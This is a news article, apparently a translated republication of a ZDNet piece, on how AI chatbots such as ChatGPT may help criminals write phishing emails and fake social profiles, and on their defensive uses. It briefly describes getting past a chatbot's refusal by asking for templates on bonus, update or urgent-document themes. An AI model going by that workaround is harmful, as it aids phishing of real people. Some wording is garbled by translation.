What AI chatbots mean for the future of cybersecurity


From relatively simple tasks, like writing emails, to more complex jobs, like writing long texts or compiling computer code, OpenAI’s ChatGPT chatbot has garnered a lot of interest ever since its launch. launch. He’s far from perfect, of course, as he’s been known to make mistakes by misinterpreting the information he learns. But many see it, and other AI tools, as the future of the internet.

OpenAI’s Terms of Service for ChatGPT specifically prohibits the generation of malware, including ransomware, keyloggers, viruses, or “any other software intended to cause some harm.” They also prohibit attempts to create spam, as well as use cases aimed at cybercrime. But as with any innovative online technology, there are already people experimenting with exploiting ChatGPT for more obscure purposes.

Make their operations more profitable

Thus, after its launch, it did not take long for cybercriminals to post discussions in underground forums about how ChatGPT could be used to facilitate criminal activities, such as writing phishing emails or helping compiling malware.

And it is feared that scammers are already trying to use ChatGPT and other AI tools, such as Google Bard. While these AI tools won’t revolutionize cyberattacks, they could help cybercriminals conduct malicious campaigns more effectively.

“I don’t think, at least in the short term, that ChatGPT will create new types of attacks. The goal will be to make their day-to-day operations more profitable,” says Sergey Shykevich, head of threat intelligence group at Check. Point.

More convincing phishing

Phishing attacks are the most common component of hacking and fraud campaigns. It is a key tool in these kinds of operations, whether it is used by attackers to send emails distributing malware, phishing links or convincing a victim to transfer money.

This reliance on email means that cybercriminals need a constant stream of clear and usable content. But fortunately, many of these phishing attempts are easy to spot as spam these days. However, an effective autowriter could make those emails more compelling.

And while cybercrime is global, language can be a barrier, especially for the most targeted phishing campaigns that rely on impersonating a trusted contact. It’s unlikely someone will believe they’re talking to a co-worker if emails are full of unusual spelling and grammatical errors or odd punctuation.

Call centers

But if the AI ​​is harnessed correctly, a chatbot could be used to compose the text of emails in the language desired by the attacker. “The big hurdle for Russian cybercriminals is the language – English,” says Shykevich. “They are now hiring English graduates from Russian universities to write phishing emails and to work in call centers – and they have to pay for it.”

He continues, “A tool like ChatGPT can save them a lot of money on creating a variety of phishing messages. I think that’s what they’ll be looking to do.” In theory, protections have been put in place to prevent abuse. For example, ChatGPT requires users to register an email address and phone number to verify registration.

But although the chatbot refuses to write phishing emails, it can be asked to create email templates for other messages that are commonly exploited by cyber attackers. These can be messages that an annual bonus is being offered, that an important software update needs to be downloaded and installed, or that an attached document needs to be reviewed urgently.

“It’s possible to create a beautifully worded and grammatically correct invitation, which you wouldn’t necessarily be able to do if you weren’t a native English speaker,” says Adam Meyers, senior vice president of intelligence at Crowdstrike, a provider of cybersecurity and threat intelligence services.

Fake profiles

But the misuse of these tools is not limited to email. Criminals could use it to write scripts for any text-based online platform. For attackers running scams, or even high-profile hacker groups trying to run spy campaigns, this tool could prove useful, especially in creating fake social profiles to lure people in.

“If you want to generate a plausible business discussion on LinkedIn to give the impression that you are a real businessman trying to make contacts, ChatGPT is ideal for that,” says Kelly Shortridge, cybersecurity expert and principal technologist produced at Fastly, a cloud computing provider.

Various hacker groups attempt to exploit LinkedIn and other social media platforms to conduct cyber espionage campaigns. But creating fake, legitimate-looking online profiles — and filling them with messages — is a time-consuming process. Kelly Shortridge thinks hackers could use AI tools like ChatGPT to write compelling content, while having the benefit of being less labor intensive than if the work was done manually.

“A lot of social engineering campaigns like this take a lot of effort because you have to set up these profiles,” she explains, believing that AI tools could significantly lower the barrier to entry. . “I’m sure ChatGPT could craft some very compelling thought leadership messages,” she says.

No way to completely eliminate abuse

The nature of technological innovation means that whenever something new appears, there will always be people trying to exploit it for malicious purposes. And even with the most innovative ways to try to prevent abuse, the devious nature of cybercriminals and fraudsters means they’ll likely find ways to circumvent protections.

“There is no way to completely eliminate abuse. This has never happened with any system,” says Shykevich, who hopes highlighting potential cybersecurity issues will lead to more debate on how to prevent abuse. prevent AI chatbots from being exploited for malicious purposes.

“It’s great technology, but as always with new technology, there are risks and it’s important to discuss them to be aware of them. And I think the more we talk, the more likely it is that OpenAI and other similar companies invest more in reducing abuse,” he suggests.

Interest in cybersecurity

AI chatbots such as ChatGPT are also of interest for cybersecurity. They are particularly good at dealing with and understanding code. It is therefore possible to use them to help defenders understand malware. Since they can also write code, it’s possible that by helping developers with their projects, these tools can help create better and safer code faster.

As Forrester principal analyst Jeff Pollard recently wrote, ChatGPT could significantly reduce the time it takes to report security incidents. “Processing these reports more quickly frees up more time for other tasks – testing, assessment, investigation and response – which helps security teams adapt,” he notes, adding that a bot could suggest recommended next actions based on available data.

“If security orchestration, automation, and response are properly configured to speed artifact recovery, it could speed up detection and response and help security operations center analysts make better decisions” . Chatbots could therefore make life more difficult for some cybersecurity players, but there could also be positive sides.

Zdnet.com contacted OpenAI for comment, but did not receive a response. However, Zdnet.com asked ChatGPT what rules they have in place to prevent it from being used for phishing purposes – and we received the following.

“It is important to note that while AI language models like ChatGPT can generate texts similar to phishing emails, they cannot perform malicious actions on their own. It is therefore important that users exercise caution and good judgment when using AI technology, and be vigilant to protect against phishing and other malicious activity.”


Source: “ZDNet.com”






Source link -97